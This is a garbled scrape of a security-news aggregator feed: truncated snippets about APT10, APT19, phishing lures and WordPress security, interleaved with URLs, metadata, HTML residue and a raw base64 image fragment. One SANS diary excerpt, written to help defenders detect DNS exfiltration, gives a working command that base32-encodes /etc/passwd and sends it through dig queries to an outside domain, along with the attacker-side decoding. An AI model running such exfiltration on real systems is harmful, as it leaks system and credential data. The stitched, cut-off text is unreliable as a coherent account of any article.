there) mentioning APT, there's not much else available. A Google search for "advanced persistent threat" -netwitness -mandiant -Northrop yields 34 results (prior to this blog post). (emphasis added)Today that search yields 244,000 results.I would argue we're "past APT." APT was the buzzword for ]]> 2018-01-14T14:08:40+00:00 http://taosecurity.blogspot.com/2018/01/remembering-when-apt-became-public.html www.secnews.physaphae.fr/article.php?IdArticle=459740 False None APT 17,APT 1 None Bleeping Computer - Magazine Américain 2017-12-13T10:05:21+00:00 https://www.bleepingcomputer.com/news/google/google-releases-an-updated-seo-starter-guide/ www.secnews.physaphae.fr/article.php?IdArticle=450112 False None APT 19 None NoticeBored - Experienced IT Security professional latest issue outlines some of the tricks used by phishers to lure their victims initially."It is not breaking news that phishing is the leading cause of data breaches in the modern world. It is safe to ask why that is the case though, given how much of this email gets caught up in our spam filters and perimeter defenses. One trick sophisticated attackers use is triggering emotional responses from targets using simple and seemingly innocuous messaging to generate any response at all. Some messaging does not initially employ attachments or links, but instead tries to elicit an actual reply from the target. Once the attackers establish a communication channel and a certain level of trust, either a payload of the attacker's choosing can then be sent or the message itself can entice the target to act."That same technique is used by advertisers over the web in the form of lurid or intriguing headlines and images, carefully crafted to get us to click the links and so dive into a rabbit warren of further items and junk, all the while being inundated with ads. You may even see the lures here or hereabouts (courtesy of Google). Once you've seen enough of them, you'll recognize the style and spot the trigger words - bizarre, trick, insane, weird, THIS and so on, essentially meaning CLICK HERE, NOW!They are curiously attractive, almost irresistible, even though we've groped around in the rabbit warrens before and suspect or know what we're letting ourselves in for. But why is that? 'Curiously' is the key: it's our natural curiosity that leads us in. It's what led you to read this sentence. Ending the previous paragraph with a rhetorical question was my deliberate choice. Like magpies or trout chasing something shiny, I got you. You fell for it. I manipulated you.     Sorry.There are loads more examples along similar lines - random survey statistics for instance ("87% of X prone to Y") and emotive subjects ("Doctors warn Z causes cancer"). We have the newspapers to thank for the very term 'headline', not just the tabloid/gutter press ("Elvis buried on Mars") but the broadsheets and more up-market magazines and journals, even scientific papers. The vast majority of stuff we read has titles and headings, large and bold in style, both literally and figuratively. Postings on this blog all have short titles and a brief summary/description, and some of the more detailed pieces have subheadings providing structure and shortcuts for readers who lack the time or inclination to read every word ... which hints at another issue, information overload. Today's Web is so vast that we're all sipping from the fire hose.And that ]]> 2017-12-05T08:24:37+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/3LVcWWqpfYw/nblog-december-5-lurid-headline.html www.secnews.physaphae.fr/article.php?IdArticle=444167 False Guideline APT 15 None ZD Net - Magazine Info 2017-11-02T09:19:30+00:00 http://www.zdnet.com/article/wordpress-patches-sql-injection-bug-in-emergency-release/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=427038 False None APT 19 None Security Affairs - Blog Secu 2017-10-04T11:12:03+00:00 http://securityaffairs.co/wordpress/63801/apt/ccleaner-apt17-hackers.html www.secnews.physaphae.fr/article.php?IdArticle=415099 False None APT 17,CCleaner None 01net. Actualites - Securite - Magazine Francais ]]> 2017-09-21T08:34:32+00:00 http://www.01net.com/actualites/piratage-ccleaner-la-chine-se-cache-t-elle-derriere-cette-attaque-1261474.html www.secnews.physaphae.fr/article.php?IdArticle=410912 False None APT 17,CCleaner 3.0000000000000000 Security Affairs - Blog Secu 2017-09-20T10:49:05+00:00 http://securityaffairs.co/wordpress/63201/data-breach/viacom-data-leak.html www.secnews.physaphae.fr/article.php?IdArticle=410129 False None APT 15 None Bleeping Computer - Magazine Américain 2017-09-15T11:10:39+00:00 https://www.bleepingcomputer.com/news/security/security-txt-standard-proposed-similar-to-robots-txt/ www.secnews.physaphae.fr/article.php?IdArticle=408931 False None APT 19 None TrendLabs Security - Editeur Antivirus Trendlabs Security Intelligence Blog - by Trend Micro ChessMaster Makes its Move: A Look into the Campaign's Cyberespionage Arsenal ]]> 2017-07-27T11:30:10+00:00 http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/8XGEVNIxCaU/ www.secnews.physaphae.fr/article.php?IdArticle=389605 False None APT 10 None Infosec Island - Security Magazine 2017-07-12T03:47:02+00:00 https://www.infosecisland.com/blogview/24952-Convenience-Comes-at-a-Steep-Price-Password-Management-Systems-amp-SSO.html www.secnews.physaphae.fr/article.php?IdArticle=383497 False None APT 15 None Bleeping Computer - Magazine Américain 2017-07-07T10:26:58+00:00 https://www.bleepingcomputer.com/news/security/zip-bombs-can-protect-websites-from-getting-hacked/ www.secnews.physaphae.fr/article.php?IdArticle=382398 False None APT 19 None ZD Net - Magazine Info 2017-07-06T15:30:00+00:00 http://www.zdnet.com/article/lets-encrypt-brings-wildcard-certificates-to-the-web/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=381840 False None APT 19 None Mandiant - Blog Sécu de Mandiant Summary In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government. APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the]]> 2017-06-06T17:30:00+00:00 https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel www.secnews.physaphae.fr/article.php?IdArticle=8377775 False Vulnerability APT 19 4.0000000000000000 IT Security Guru - Blog Sécurité 2017-05-10T08:54:57+00:00 http://www.itsecurityguru.org/2017/05/10/anti-virus-defences-leaving-global-businesses-vulnerable-china-syndrome/ www.secnews.physaphae.fr/article.php?IdArticle=363724 True None APT 10 None SANS Institute - SANS est un acteur de defense et formation 2017-05-04T16:20:16+00:00 https://isc.sans.edu/diary.html?storyid=22376&rss www.secnews.physaphae.fr/article.php?IdArticle=362215 False None APT 15 None Network World - Magazine Info Jeffrey Scolaro, an attorney at Daley Mohan Groble PC in Chicago and a member of Legal Services Link, answers questions about employment contracts.Are employment contracts for IT workers negotiable, or are they one-size-fits-all? The axiom that “everything is negotiable” should be where all IT professionals begin their assessment of proposed employment contracts. However, the IT industry in particular can be especially rigid in its collective enforcement of employment agreements.To read this article in full or to leave a comment, please click here]]> 2017-05-01T05:22:00+00:00 http://www.networkworld.com/article/3193377/careers/career-watch-be-wary-of-it-employment-contracts.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=360462 False None APT 17 None SANS Institute - SANS est un acteur de defense et formation 1] states that a DNS query length is255 characters total with each subdomain being 63 characters or less. By using Base32 encoding[2], we can encode our data instrings compatible with the DNS requirements: A-Z, 0-9 and - padding:5px 10px"> $ cat /etc/passwd | base32 -w 63 | while read L do dig $L.data.rootshell.be @192.168.254.8 done Note: the parameter -w 63 padding:5px 10px"> $ grep data.rootshell.be queries.log 20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8) ... To decode this on the attacker padding:5px 10px"> $ grep data.rootshell.be queries.log | cut -d -f8 | cut -d . -f1| base32 -d | more root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ... We don padding:5px 10px"> # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep A\? .*\.data\.rootshell\.be tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 172.x.x.x.40335 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.35770 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.41463 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.38048 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) ... As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularlythe query length. The following graph width:770px" /> But, as usual, not all big DNS queries are suspicious. Some CDNs padding:5px 10px"> hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf To reduce the risk of false positives, this control can be combined with others: The volume of traffic per IP The volume of traffic per (sub-)domain White-lists This technique is not new but comes back regularly]]> 2017-04-20T07:07:42+00:00 https://isc.sans.edu/diary.html?storyid=22326&rss www.secnews.physaphae.fr/article.php?IdArticle=359221 False None APT 18 None Korben - Bloger francais > Lire la suite Cet article merveilleux et sans aucun égal intitulé : Keys-To-Go de Logitech ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. ]]> 2017-04-15T11:39:14+00:00 http://feedproxy.google.com/~r/KorbensBlog-UpgradeYourMind/~3/JOYpdYIaNIg/keys-to-go-de-logitech.html www.secnews.physaphae.fr/article.php?IdArticle=358892 False None APT 15 None Dark Reading - Informationweek Branch 2017-04-06T19:15:00+00:00 http://www.darkreading.com/attacks-breaches/china-based-threat-actor-apt10-ramps-up-cyber-espionage-activity/d/d-id/1328584?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=355257 False None APT 10 None Mandiant - Blog Sécu de Mandiant blog conjoint >

---

APT10 Background APT10 (MenuPass Group) is a Chinese cyber espionage group that FireEye has tracked since 2009. They have historically targeted construction and engineering, aerospace, and telecom firms, and governments in the United States, Europe, and Japan. We believe that the targeting of these industries has been in support of Chinese national security goals, including acquiring valuable military and intelligence information as well as the theft of confidential business data to support Chinese corporations. PwC and BAE recently issued a joint blog detailing extensive APT10 activity.]]> 2017-04-06T14:00:00+00:00 https://www.mandiant.com/resources/blog/apt10-menupass-group www.secnews.physaphae.fr/article.php?IdArticle=8377784 False Threat,Technical APT 10,APT 10 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2017-04-06T11:03:37+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/4y3dTLA8bok/hacking-trump-xi-trade.html www.secnews.physaphae.fr/article.php?IdArticle=354396 False None APT 10 None Network World - Magazine Info according to security vendor Fidelis Cybersecurity.The NFTC lobbies for open and fair trade and has pledged to work with U.S. President Donald Trump to "find ways to address Chinese policies that frustrate access to their market and undermine fair trade, while at the same time encouraging a positive trend in our trade relationship." Trump will meet with China President Xi Jinping in Florida this week.To read this article in full or to leave a comment, please click here]]> 2017-04-06T10:13:00+00:00 http://www.networkworld.com/article/3187846/security/us-trade-lobbying-group-attacked-by-suspected-chinese-hackers.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=354462 False None APT 10 None Dark Reading - Informationweek Branch 2017-04-05T09:15:00+00:00 http://www.darkreading.com/attacks-breaches/chinese-apt10-hacking-group-suspected-of-global-campaign-targeting-msps/d/d-id/1328563?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=353868 False None APT 10 None Network World - Magazine Info joint report.That's because these suppliers often have direct access to their client's networks. APT10 has been found stealing intellectual property as part of a global cyberespionage campaign that ramped up last year, PwC said on Monday.To read this article in full or to leave a comment, please click here]]> 2017-04-04T13:39:28+00:00 http://www.networkworld.com/article/3187359/security/chinese-hackers-go-after-third-party-it-suppliers-to-steal-data.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=352635 False None APT 10 None BAE - BAE Systelm Threat Research For many businesses the network now extends to suppliers who provide management of applications, cloud storage, helpdesk, and other functions. With the right integration and service levels Managed Service Providers (MSPs) can become a key enabler for businesses by allowing them to focus on their core mission while suppliers take care of background tasks. However, the network connectivity which exists between MSPs and their customers also provides a vector for attackers to jump through. Successful global MSPs are even more attractive as they become a hub from which an intruder may access multiple end-victim networks.Since late 2016 we have been investigating a campaign of intrusions against several major MSPs. These attacks can be attributed to the actor known as APT10 (a.k.a. CVNX, Stone Panda, MenuPass, and POTASSIUM). Their activity seems to have increased in mid-2016, and has focused on compromise of MSPs as a stepping stone into victim organisations.Figure 1 – Attack stages for APT10 in targeting MSP end-customersWe have joined forces with PwC to release our findings from investigations into these on-going attacks and raise awareness. This joint analysis report can be found on PwC's blog at:https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.htmlOVERVIEWThe current campaign linked to APT10 can be split into two sets of activity:1. Attacks targeting MSPs, engineering and other sectors with common as well as custom malware;2. Attacks targeting Japanese organisations with the 'ChChes' malware;The latter campaign has been well covered in the public domain, however the MSP targeting is the focus of our joint analysis report with PwC.The group use a custom dropper for their various implants. This dropper makes use of DLL side-loading to execute the main payload.In our analysis the attackers have used several payloads including:1. PlugX – a well-known espionage tool in use by several threat actors2. RedLeaves – a newly developed, fully-featured backdoor, first used by APT10 in recent monthsINFRASTRUCTUREThe C&C domains chosen by the APT10 actors for their MSP-related campaign are predominantly dynamic-DNS domains.The various domains are highly-interconnected through shared IP address hosting, even linking back historically to the group's much older operations. The graph below depicts infrastructure used by the attackers in late 2016.Figure 2 – Infrastructure view from late 2016In recent months the infrastructure has expanded significantly. The nodes number into the thousands and cannot be easily visualised.The below graph represents a linkage between one of the PlugX C&Cs used in the group's newer ope]]> 2017-04-03T18:09:04+00:00 http://baesystemsai.blogspot.com/2017/04/apt10-operation-cloud-hopper_3.html www.secnews.physaphae.fr/article.php?IdArticle=352306 False None APT 10,APT 1 None UnderNews - Site de news "pirate" francais D'après Google, il est aujourd'hui facile pour les pirates informatiques de pirater les sites Web. La raison ? Leur obsolescence surtout. Le géant américain met en garde les webmasters pour 2017 face aux dangers.]]> 2017-03-22T08:29:52+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/6Br6NtfrPPA/piratages-lavertissement-de-google-pour-2017.html www.secnews.physaphae.fr/article.php?IdArticle=342843 False None APT 19 None Dark Reading - Informationweek Branch 2017-03-21T10:05:00+00:00 http://www.darkreading.com/cloud/hacked-sites-up-by-32--in-2016-over-2015-says-google/d/d-id/1328445?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=342699 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Daniel Cid is the founder and CTO for Sucuri. He’s also on the AlienVault Technology Advisory Board and is the founder of OSSEC HIDS. I interviewed him to get his thoughts on website security, and the security of content management systems (CMS). Q: What are the most serious challenges and trends you are seeing with website security? At a high level, the most popular CMS platforms (eg. WordPress, Magento, Drupal, etc) and frameworks are getting a lot better in terms of security, whether it’s a secure by default configurations or employing more appropriate security coding and best practices. We rarely see major issues in the core of these applications, and even when they do have issues there is a system in place that helps streamline the process of patching environments at scale. The platform that is leading the charge on this is WordPress, and a perfect example of this system is best illustrated with the vulnerability we disclosed in the new REST API. Via their auto-update feature they were able to patch very quickly and effectively millions of sites in a one-week time period. As impactful as these change are however, they aren't& stopping the attacks and the compromises. Simply put, it’s not because platform security is the problem, but rather website security is much more complex than code or tools, and needs the people and processes behind it to remain secure. Consider WordPress, for example. They have their famous 5-minute install. What a great message, and it has been huge in achieving their broad user adoption. Note, it actually takes a lot more than 5 minutes to secure and harden the environment, let it alone configure it to be fully functional to your liking. That isn’t the message a webmaster wants to receive, and this becomes especially challenging when you take into consideration the technical aptitude of most of today’s webmasters - which is very low. So I think the main challenge I see right now is that there needs to be a level of education to the people deploying websites. There are additional steps that go beyond the basic installation and configuration requirements, and it includes investing some energy into security. These steps need to be more visible, actionable and easier to adopt. Q: Can just buying products really fix website security? No. Technology alone will never be the solution; just buying a product won’t work at any level of security. Note that we do sell a cloud-based security software (a WAF for websites), but we work very hard to have a dialog with our customers where we try to educate and communicate the importance of people, process and technology in their security posture. Q: What do you think about OWASP and other organizations that are focused on web application security? I think they are great. They are a powerful resource for developers and security professionals to be more aware of web application security issues. Q: We hear a lot of fear, uncertainty and doubt (FUD) around WordPress security. What helpful advice could you give our readers who are using Wordpress currently? The problem in the WordPress security space is that the majority of users are not very technical, and there is also a lot of misinformation and disinformation being spre]]> 2017-03-20T13:00:00+00:00 http://feeds.feedblitz.com/~/283151240/0/alienvault-blogs~Interview-with-Daniel-Cid-founder-of-OSSEC www.secnews.physaphae.fr/article.php?IdArticle=340899 False Guideline APT 19 None taosecurity - Blog Sécurité Chinois Exactly six years ago today I announced that I was joining Mandiant to become the company's first CSO. Today is my last day at FireEye, the company that bought Mandiant at the very end of 2013.The highlights of my time at Mandiant involved two sets of responsibilities.First, as CSO, I enjoyed working with my small but superb security team, consisting of Doug Burks, Derek Coulsen, Dani Jackson, and Scott Runnels. They showed that "a small team of A+ players can run circles around a giant team of B and C players."Second, as a company spokesperson, I survived the one-of-a-kind ride that was the APT1 report. I have to credit our intel and consulting teams for the content, and our marketing and government teams for keeping me pointed in the right direction during the weeks of craziness that ensued.At FireEye I transitioned to a strategist role because I was spending so much time talking to legislators and administration officials. I enjoyed working with another small but incredibly effective team: government relations. Back by the combined FireEye-Mandiant intel team, we helped policy makers better understand the digital landscape and, more importantly, what steps to take to mitigate various risks.Where do I go from here?Twenty years ago last month I started my first role in the information warfare arena, as an Air Force intelligence officer assigned to Air Intelligence Agency at Security Hill in San Antonio, Texas. Since that time I've played a small part in the "cyber wars," trying to stop bad guys while empowering good guys.I've known for several years that my life was heading in a new direction. It took me a while, but now I understand that I am not the same person who used to post hundreds of blog entries per year, and review 50 security books per year, and write security books and articles, and speak to reporters, and testify before Congress, and train thousands of students worldwide.That mission is accomplished. I have new missions waiting.My near-term goal is to identify opportunities in the security space which fit with my current interests. These include:Promoting open source software to protect organizations of all sizesAdvising venture capitalists on promising security start-upsHelping companies to write more effective security job descriptions and to interview and select the best candidates availableMy intermediate-term goal is to continue my Krav Maga training, which I started in January 2016. My focus is the General Instructor Course pr]]> 2017-03-17T08:00:00+00:00 http://taosecurity.blogspot.com/2017/03/bejtlich-moves-on.html www.secnews.physaphae.fr/article.php?IdArticle=361043 False None APT 1 None We Live Security - Editeur Logiciel Antivirus ESET 2017-03-07T12:03:12+00:00 http://feedproxy.google.com/~r/eset/blog/~3/MkxK6_DVakw/ www.secnews.physaphae.fr/article.php?IdArticle=329882 False None APT 19 None SANS Institute - SANS est un acteur de defense et formation NAME,IP,DEVTYPE cisco_ios_router_or_switch,192.168.12.101,1 cisco_asa,192.168.12.102,2 cisco_wireless_controller,192.168.12.103,3 hp_procurvesw01,192.168.12.104,4 hp_comwaresw01,192.168.12.105,5 pan_firewall_set,192.168.12.106,6 pan_firewall_xml,192.168.12.106,7 The code reads the file as a CSV, so populates a devices variable with properties of: devices.name, devices.IP (which can also be a CN or FQDN, it just needs to resolve), and devices.devtype The 7 device types are covered in the example.in file above. Note that the Palo Alto is in there twice, devicetype 6 for setbase64,iVBORw0KGgoAAAANSUhEUgAAAjEAAACPCAIAAACEUh2PAAAgAElEQVR4nOydeXwcV5Xvz71V3ZIs29mcxJvUXXXvrW7JGyQhGZhhgOxeZKm7qu6t6tbiLc5GbGBmGOANAzMPHhBI7GwEsjghiSFACImy285GHNuxnFje90WyJVt7q6WWZHmp90d1t1qLTQJ8CIH25/fxR253V926VTrfPvecew4gyrPKKqusssrqb0HwsY8gq6yyyiqrrFxlmZRVVlllldXfirJMyiqrrLLK6m9FWSZllVVWWWX1t6KPn0mwdMOh2uq/wHFIdU08fmj1ssx/JhKJRCIRP+fxgSyrrtuznJh/8UtbXjswnoHTrdgTr9tg/0VP93dwCVlllVVW6GxMyjToiUQibYCALKuuG+H1EWWvbhx45zmpsLy2sXrphzVw9urGcx/tT3g/rNgz3PKe9c1LNxyKfygA/DUN+ke7BFJdE/9Qc/5XZpL74H2k+5tVVln9PekcTEraLNdM1Kww0Vks1IiyVzfGP5zhRhmuEqgCUYEZR64oB8oRMZFqADVB4+AT89883lGzCgIcaSbWTGAG0LDERI5WLlEbiAnMhmA5MAEkjNQof/XIyU3PAzOBcVnjiHGJWphyRAxMuaRZoJQiddnzxxvvYbpUaAE1gbrvEe4AgJqIcolwSeWyYsr/sW5/9/6HlSqgYUTCWAkjVQdiIGIgamBqYmoC5UD4sk19B1//EQRtrFmYCqwK8JfB43Wn69/jqgWqDloIMRNTC1ELUQFUQPKMroa/wuFsc/hRXK]]> 2017-02-17T13:47:01+00:00 https://isc.sans.edu/diary.html?storyid=22079&rss www.secnews.physaphae.fr/article.php?IdArticle=317642 False None APT 15 None Palo Alto Network - Site Constructeur 2017-02-16T19:00:11+00:00 http://feedproxy.google.com/~r/PaloAltoNetworks/~3/m_xRUo8R3cs/ www.secnews.physaphae.fr/article.php?IdArticle=317019 False None APT 10 None Bleeping Computer - Magazine Américain 2017-02-09T17:06:50+00:00 https://www.bleepingcomputer.com/news/security/google-makes-wordpress-site-owners-nervous-due-to-confusing-security-alerts/ www.secnews.physaphae.fr/article.php?IdArticle=311104 False None APT 19 3.0000000000000000 ZD Net - Magazine Info 2017-02-08T11:41:55+00:00 http://www.zdnet.com/article/thousands-of-wordpress-websites-fall-prey-to-defacement/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=308799 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Open Threat Exchange (OTX) platform. As a way to say hello, I’ve put down some thoughts on why I was so keen to come work on OTX. A lot has changed since I jumped into cyber security just 5 years ago. First there was the Target breach. Then Sony. OPM. Yahoo. The elections. Between those infamous landmark case studies IT administrators have been battling constant attacks against their own networks. Ransomware trashing network shares. Users clicking “Enable Macros”. Finance teams approving fraudulent wire transactions. The security industry has had to continuously evolve to respond to ever-changing threats. The Evolution of Threat Intelligence Back in 2011 an employee of an incident response company was frustrated at the lack of threat intelligence sharing across the industry. So, they leaked the domain names used by the biggest group of attackers to Pastebin. It was a desperate attempt to prevent the mass of attacks the group was committing against both companies and governments. Two years, and hundreds of compromised organisations later, Mandiant released their landmark APT1 report. It was on the very same attackers, still using many of the same domain names. We’ve come a long way since then. Now security vendors race each other to share new waves of attacks first and government institutions are mandated to do the same. But this has led to other problems. Keeping up with all the reports is in itself a full-time job. And some reports contain false positives that set off security devices like Christmas tree lights. OTX From my viewpoint, Alienvault OTX solves these problems by: Reducing the manpower and effort organisations require to pull IoC’s out of every report. The indicators are peer reviewed for problems and fixes are applied almost instantly. The information is easy in, easy out with a growing API and list of integrations. The power of the massive community that can perform vetted information sharing in a structured format at no-cost. The key for any network like OTX is the community, and so far it’s going strong. Interested in vetted sharing of ransomware indicators? An OTX user has made a group for that. How about importing the indicators into your MISP instance? There's a group for that too. AlienVault has a long history of building community solutions that are available to organisations of all sizes, not just those with the largest security budgets. Some of you may know me from a community project I’ve worked on in my spare-time called ThreatCrowd - another open threat intelligence platform. ThreatCrowd has become used by more people than I could have hoped. It’s been a fun experiment to keep a prototype running for thousands of simultaneous users from a single Linux box! But there are serious limitations to how much I can tack onto a prototype, in my spare time and limited by my own knowledge. I’m looking forward to working with the top-notch team of AlienVault engineers to help enhance OTX and the overall community experience. I’ve only been at AlienVault a few days but I’ve seen there are some awesome enhancements planned to the interface, data-set and integrations. I won’t ruin the surprise! If you’re a user of Thr]]> 2017-01-26T14:00:00+00:00 http://feeds.feedblitz.com/~/263345200/0/alienvault-blogs~The-Evolution-of-Threat-Intelligence www.secnews.physaphae.fr/article.php?IdArticle=300868 False None APT 1,Yahoo None Hacker Republic - Site de news Hack fr Mot de passeNavigationAdwareMalwareSauvegardeVPN*Cet article a été écrit avec la participation de Keltounet* L'année 2016 a été émaillée de quelques incidents de sécurité de grande ampleur. Histoire de ne pas être le dindon de la farce, voici quelques conseils pour que l'informatique ne soit plus votre pire cauchemar. Des mots de passe complexes et différents pour chaque service On ne le répétera jamais assez : chaque service que vous utilisez doit avoir un mot de passe différent et chaque mot de passe doit être composé au minimum de huit caractères, avec des majuscules, des minuscules, des chiffres et des caractères spéciaux. On n'utilise pas le même mot de passe pour sa boîte mail que pour se connecter à Twitter ou Facebook ou à ses applicatifs métiers. Problème : comment s'en souvenir ? N'hésitez pas à utiliser un gestionnaire de mots de passe comme KeePass. Il va gérer les mots de passe à votre place, ne vous restera qu'à définir un seul mot de passe, fort évidemment. Côté sites Web, certains services proposent des authentifications à double facteur, ce qui limite les soucis de vols de mots de passe. Des bloqueurs sur des navigateurs Les sites couverts de publicités et de traqueurs en tout genre sont encore malheureusement légion. Résultats : des informations concernant votre navigation et vos habitudes de vie sont stockées, vendues, revendues, sans que vous n'ayez votre mot à dire, ni même que vous soyez au courant. On aura donc recours à un bon bloqueur de publicités, uBlock Origin, par exemple et à Privacy Badger. Il ne faut pas non plus oublier que les publicités peuvent être aussi un vecteur important de malwares. Des extensions/modules/applications vérifiées ]]> 2016-12-26T13:30:46+00:00 https://www.hackersrepublic.org/outils/reco-securite-debutants www.secnews.physaphae.fr/article.php?IdArticle=282806 False None Uber,APT 15 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Adult Friend Finder Fling Mate1 Shadi.com Muslim Match Password re-use attacks Carbonite Netflix GoToMyPC Reddit TeamViewer Camelot Deliveroo KFC Heathcare Banner Health which impacted 3.7m patients Turkish state hospitals 10m patients Queen Mary Hospital in Hong Kong saw 3,600 records accessed Al Zahra Private Medical Centre in the UAE had 4,600 records accessed. Specialist healthcare providers such as the New Jersey Spine Centre, and the ]]> 2016-12-16T14:00:00+00:00 http://feeds.feedblitz.com/~/244750874/0/alienvault-blogs~Recap-from-the-Alien-Eye-in-the-Sky www.secnews.physaphae.fr/article.php?IdArticle=275836 False None APT 15,Yahoo None SANS Institute - SANS est un acteur de defense et formation 2016-12-02T14:35:57+00:00 https://isc.sans.edu/diary.html?storyid=21779&rss www.secnews.physaphae.fr/article.php?IdArticle=266294 False None APT 10 None The State of Security - Magazine Américain Read More ]]> 2016-12-01T04:01:02+00:00 https://www.tripwire.com/state-of-security/security-data-protection/amplify-it-security-by-integrating-solutions/ www.secnews.physaphae.fr/article.php?IdArticle=263487 False None APT 10 None Hacker Republic - Site de news Hack fr AdwareMalwareUn adware est un logiciel publicitaire, non-désiré évidemment. Certains logiciels disponibles gratuitement en sont parfois équipés. Ils viennent aussi se greffer à votre navigateur. Au-delà de l'imposition de publicités sur toutes les pages que vous consultez, publicités évidemment basées sur vos précédentes navigations, ces programmes indésirables sont occasionnellement difficiles à détecter parce qu'ils ne sont ni dans les programmes installés, dans les clefs de registre, ni aucun dans les extensions de navigateurs. Ainsi, le " programme " RocketTab en est une magnifique illustration. RocketTab sur Chrome Depuis quelques semaines, lors de ma navigation sur Chrome, je voyais apparaître un encart publicitaire. Ayant testé quelques programmes dédiés au Black SEO durant l'été, j'avais attribué cette apparition à Jingling, 10k Hits ou encore Hitleap. Après un nettoyage en règle, l'encart n'était plus présent. Puis, il est réapparu. Ayant identifié qu'il s'agissait de RocketTab, j'ai commencé par regarder dans mes programmes pour voir s'il était présent. Rien à l'horizon. J'ai regardé dans mes extensions pour Chrome. Toujours rien. J'ai regardé mes clefs de registre. Encore rien. J'ai fait mouliner Avast et AdwCleaner. Néant. Et pourtant, la sale bête était toujours là :  En désespoir, j'ai réinitialisé Chrome et j'ai vérifié tout ce qu'il y avait dans le dossier AppData. Il me restait un dernier test : les extensions de Chrome. J'ai désactivé toutes les extensions et j'ai fait une recherche sur Amazon – car RocketTab me polluait aussi ma recherche Amazon. L'encart parasite avait disparu. C'est en réactivant une extension d'historique de navigation que j'ai trouvé le coupable : History Calendar 2.1.6. Cette application, trouvée sur le magasin officiel des extensions de Chrome, avait intégré une nouvelle petite fonctionnalité : l'autorisation de publicités et la case était cochée par défaut. Initialement, cette extension avait été vérifiée et autorisée par Google et cette " fonctionnalité " n'y était pas. La dernière mise à jour de cette extension date du 19 juillet 2016 et l'application a été supprimée du magasin officiel de Google Chrome à la mi-septembre 2016. Se débarrasser de RocketTab On le voit, dans mon cas, c'était relativement vicieux car je n'avais aucune raison de me méfier d'une mise]]> 2016-11-26T01:17:07+00:00 https://www.hackersrepublic.org/outils/rockettab-ladware-persistant 